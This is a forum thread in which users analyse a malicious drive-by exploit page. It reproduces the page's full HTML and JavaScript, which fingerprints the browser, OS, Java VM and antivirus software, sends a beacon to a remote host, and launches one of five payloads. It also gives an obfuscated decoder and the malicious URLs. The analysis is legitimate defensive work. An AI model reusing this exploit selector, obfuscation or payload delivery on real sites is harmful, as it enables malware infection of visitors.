Full Version: Need help identifying exploit
garsh
Some loser posted a link to a website that appears to run some kind of browser exploit.
I was hoping somebody here could help me track this down.
I'd like to know what browsers it works against, and what it attempts to do.

Here's the HTML code that it runs:
CODE
<HTML xmlns:IE>
<TITLE>Gallery</TITLE>
    <HEAD>
         <!-- Binds the IE-only clientCaps behavior to the IE:clientCaps element
              below; the script uses it (GetVersion) to read the version of
              installed components, which drives the exploit selection. -->
         <STYLE type='text/css'>
            IE\:clientCaps {behavior:url(#default#clientcaps)}
         </STYLE>
    </HEAD>
<BODY>

<CENTER><H1></H1></CENTER>

<!-- Two hidden frames: StatPage is the target of the tracking beacon
     (CGI_Script + "?click" ...), PageContainer is where 0day.htm is loaded
     for exploit 5. Hidden 5x5 iframes like these are a typical drive-by marker. -->
<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>
<!-- Filled with the <applet> markup for exploit 1 via innerHTML. -->
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="javascript">

// Looks up the installed version of the component identified by CLSID through
// the IE clientCaps behavior bound to the oClientCaps element in the page body.
// Returns the version as an array of its comma-separated parts (strings), or
// [0, 0, 0, 0] when the component is not installed.
function GetVersion(CLSID)
{
    var isInstalled = oClientCaps.isComponentInstalled(CLSID, "ComponentID");
    if (!isInstalled)
    {
        return Array(0, 0, 0, 0);
    }
    var versionText = oClientCaps.getComponentVersion(CLSID, "ComponentID");
    return versionText.split(",");
}

// Maps the navigator.appVersion string to a short Windows label ("95", "NT",
// "ME", "98", "2K", "XP", "2K3"). The markers are tried in the original order,
// the first substring match wins, and no match leaves the result undefined.
function Get_Win_Version(IE_vers)
{
    var markers = [
        ['Windows 95', "95"],
        ['Windows NT 4', "NT"],
        ['Win 9x 4.9', "ME"],
        ['Windows 98', "98"],
        ['Windows NT 5.0', "2K"],
        ['Windows NT 5.1', "XP"],
        ['Windows NT 5.2', "2K3"]
    ];
    for (var k = 0; k < markers.length; k++)
    {
        if (IE_vers.indexOf(markers[k][0]) != -1)
        {
            return markers[k][1];
        }
    }
    // Nothing matched: fall through without a value, as the original did.
}

// Exploit 4 (scheduled with a 2 s setTimeout in the dispatch below): writes four
// 1x1 iframes loading pluginst.htm and one loading ie0601d.htm into the page.
// The name suggests a buffer-overflow trigger, but the contents of those two
// pages are not shown here. The loop index i is an implicit global (no var).
function Run_BOF()
   {
    self.focus();
    for (i=1; i <=4; i++)
    {
        document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
    }
    document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');
   }

// Remote CGI endpoint used as a hit counter ("?click" plus the visitor's service
// pack tokens) and, for exploit 1, as the URL handed to the applet
// ("?exploit=MS03-11"). Host and path are the main network indicator here.
var CGI_Script="http://196.regvista.com/cgi-bin/ie0601.cgi";

// Triage: Internet Explorer on Win32 is fingerprinted (OS, service packs, Java VM
// build, two AV products) and routed to one of five payload pages; every other
// browser takes the else-branch at the bottom.
if (navigator.appName=="Microsoft Internet Explorer")
   {
      Click_Request=CGI_Script+"?click";
      // Directory of the current page, later used to build absolute URLs
      // for ie0601a.jar and ie0601b.chm.
      var InetPath=document.location.href;
      j=InetPath.lastIndexOf('/');
      InetPath=InetPath.slice(0,j);

      var ExploitNumber=1;
      var IEversion=navigator.appVersion;
      var IEplatform=navigator.platform;
      if (IEplatform.search("Win32") != -1)
      {
         var WinOS=Get_Win_Version(IEversion);
         // appMinorVersion is split on ';' into patch tokens; every token that
         // contains "SP" is appended to the beacon URL (e.g. "&SP2" — constructed).
         FullVersion=clientInformation.appMinorVersion;
         PatchList=FullVersion.split(";");
         for (var i=0; i < PatchList.length; i++)
         {
           ServicePack=PatchList[i];
           j=ServicePack.indexOf('SP');
           if (j != -1)
           {
              ServicePack=ServicePack.substr(j);
              Click_Request=Click_Request+'&'+ServicePack;
           }
         }
         // Fire the tracking beacon through the hidden StatPage iframe.
         StatPage.location=Click_Request;
         // Component versions via clientCaps. The first CLSID is treated as the
         // Microsoft Java VM (the 3810 build check below and the MS03-11 label
         // point that way — confirm against the CLSID); the second appears to be
         // IE itself, but the global IE_vers is never read afterwards.
         var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");
         var IE_vers   = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
         // AV presence checks: instantiate each product's ActiveX control and
         // treat a thrown error as "not installed". Both failures are swallowed.
         fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
         try
         {
           var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization
           fNortonAV=1;
         }
         catch(e){}
         try
         {
           var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization
           fMcAfee=1;
         }
         catch(e){}

         // Exploit selection. JVM_vers[2] is a string from split(","); the '<'
         // comparison coerces it to a number. Old Java VM -> 1; otherwise the
         // choice depends on OS, XP SP2, and whether an AV product was found.
         switch (WinOS)
         {
             case "2K":
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }
                       else                                // if JVM = 5.0.3810.0 or higher
                       {
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; }
                          else
                          { ExploitNumber=2; }
                       }
                       break;
             case "2K3":
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; }
                          else
                          { ExploitNumber=4; }
                       break;
             case "XP":

                            if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                            {  ExploitNumber=1;  }
                            else                                // if JVM = 5.0.3810.0 or higher
                            {
                               // Reuses the global i; looks for an exact "SP2" token.
                               for (var i=0; i < PatchList.length; i++)
                               {
                                  if (PatchList[i]=="SP2")
                                  {  XP_SP2_patched=1; }

                               }
                               if (XP_SP2_patched==0)
                               {
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=3; }
                                  else
                                  { ExploitNumber=5; }
                               }
                               else
                               {
                                  // Both arms assign 5: on XP SP2 the AV check is a no-op.
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=5; }
                                  else
                                  { ExploitNumber=5; }
                               }
                            }
                       break;
             default:
                       // 95 / 98 / ME / NT4 and unrecognised OS strings.
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }
                       else
                       {  ExploitNumber=2;  }            // if JVM = 5.0.3810.0 or higher

                       break;
         }
         // Launch the payload selected above. Artifacts per number:
         // 1 = applet ie0601a.jar (labelled MS03-11), 2 = ms-its/mhtml CHM object
         // (ie0601b.chm), 3 = off-screen popup of ie0601c.htm, 4 = Run_BOF
         // (pluginst.htm / ie0601d.htm), 5 = 0day.htm in the hidden PageContainer.

         switch (ExploitNumber)
         {
             case  1:
                       Trojan_Path=CGI_Script+"?exploit=MS03-11";
                       ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1  height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';
                       break;
             case  2:
                       CHM_base='//ie0601b.chm'+'::'+'/main.htm';
                       // unescape() yields "ms-its:mhtml:" — the %xx escapes only
                       // hide the protocol names from simple string matching.
                       Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
                       // IE-only createElement with a full tag string.
                       oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");
                       document.body.appendChild(oMSITS);
                       document.title="Loaded !";
                       break;
             case  3:
                       // Popup positioned at 2000,2000 so it opens off-screen; the
                       // forum's line wrapping split this string literal in two.
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1
,menubar=0,titlebar=0,toolbar=0,status=0");
self.focus();
                       break;
             case  4:
                       setTimeout('Run_BOF()',2000);
                       break;
             case  5:
                       PageContainer.location="0day.htm";
                       break;
             default:
                       break;
          }

      }
   }
   else
   {
        // Non-IE browsers: Netscape/Firefox get a hidden iframe loading ff.html;
        // everyone still triggers the beacon.
        if (navigator.appName == "Netscape")
          {
            document.write('<IFRAME src="ff.html" width=5 height=5 style="display:none"></IFRAME>');
          }
       StatPage.location=CGI_Script+"?click";
   }

</script>
</BODY>
</HTML>
BlueTDimly
It's nice that they enumerate all the exploits for you.

Did you download the source of ff.html or 0day.htm in a safe browser?

Looks like "Exploit 2" may correspond to this virus:
http://www.trendmicro.com/vinfo/virusencyc...5FCODEBASE%2EBB
BlueTDimly
I tried downloading ff.html simply by telnetting to port 80, and I got a 404. I'll try installing lynx and see if I can get some of these other files.
BlueTDimly
Here's another reference to the same/similar hijack code on bugtraq:

http://www.bugtraq.ru/cgi-bin/forum.mcgi?t...=8&m=132407
NARC
ie0601a.jar pops up in a bunch of google results....
garsh
QUOTE(BlueTDimly @ 7-24-06, 10:48am) *
Did you download the source of ff.html or 0day.htm in a safe browser?

I've been using wget to grab these pages.

But I had already clicked on the link originally.

I guess I'll do a Windows Restore and then run a virus check.
Monga
Was it a link from here in B$? Would you mind sharing what the link was, so I know whether I also clicked on it?
TIA
garsh
QUOTE(Monga @ 7-24-06, 12:46pm) *
Was it a link from here in B$? Would you mind sharing what the link was, so I know whether I also clicked on it?

It was posted here in BS at 6:21am EST in General Discussion.
I removed it before 7am EST.

The link was: ~http://pu-blocker.com/ (DO NOT C&P THIS LINK, OR MALWARE WILL BE INSTALLED!)

That link redirects to: ~http://196.regvista.com/index.php?ref=f1 (DO NOT C&P THIS LINK, OR MALWARE WILL BE INSTALLED!)

Which contains some obfuscated javascript. Here is the javascript code, with the payload removed.
Running this code produced the document given in the original post of this thread:
CODE
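// Decoder for the obfuscated script on the redirect page (it ran inline in a
// <script> element there). The listing was garbled by the forum: the table
// literal was wrapped across blank lines and "Array(" survived as the HTML
// entity "Array& #40;" — both are repaired here; the logic is unchanged.
//
// Encoding: a 64-symbol alphabet (0-9, @, A-Z, _, a-z) is mapped through t
// (indexed by charCode - 48) to a 6-bit value; four symbols pack into three
// bytes, little-endian, and every byte is XORed with 165. The decoded text is
// written to the page with document.write in 1024-symbol chunks, where the
// browser renders and executes it. For offline analysis, swap document.write
// for a function that records r instead of rendering it.
//
// @param {string} x - encoded text made only of alphabet symbols
function decrypt_p(x) {
  var l = x.length;
  var b = 1024;
  var i;
  var j;
  var r;
  var p = 0;
  var s = 0;
  var w = 0;
  // 6-bit value per symbol; the zeros at ':'..'?', '['..'^' and '`' are
  // filler for code points that are not part of the alphabet.
  var t = [
    63, 17, 52, 41, 5, 42, 14, 31, 25, 3, 0, 0, 0, 0, 0, 0, 47, 4, 1, 27,
    32, 55, 8, 16, 18, 9, 26, 34, 39, 56, 28, 49, 40, 37, 51, 2, 59, 43, 21, 54,
    48, 36, 6, 0, 0, 0, 0, 57, 0, 61, 58, 20, 19, 62, 60, 24, 12, 10, 44, 35,
    22, 53, 46, 23, 30, 33, 7, 15, 13, 50, 29, 11, 45, 38, 0
  ];
  for (j = Math.ceil(l / b); j > 0; j--) {
    r = '';
    for (i = Math.min(l, b); i > 0; i--, l--) {
      w |= t[x.charCodeAt(p++) - 48] << s;
      if (s) {
        // s cycles 6 -> 4 -> 2 -> 0: one byte out per symbol except the first of four.
        r += String.fromCharCode(165 ^ w & 255);
        w >>= 8;
        s -= 2;
      } else {
        s = 6;
      }
    }
    document.write(r);
  }
}
// On the live page this was followed by decrypt_p("<encoded payload>"); the
// poster removed the string ("BIG LONG STRING REMOVED HERE").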
Monga
But what was it allegedly for? I hope I didn't click on it!
BlueTDimly
I've identified a couple of the exploits so far.

exploit 1 - MS Java VM
http://www.microsoft.com/technet/security/...n/MS03-011.mspx

exploit 2 - CHM Codebase_BB - MSOE Exploit
http://www.trendmicro.com/vinfo/virusencyc...5FCODEBASE%2EBB

Also, a google search for the site (196.regvista.com) turned up some interesting results:
http://www.google.com/search?hl=en&hs=...regvista.com%22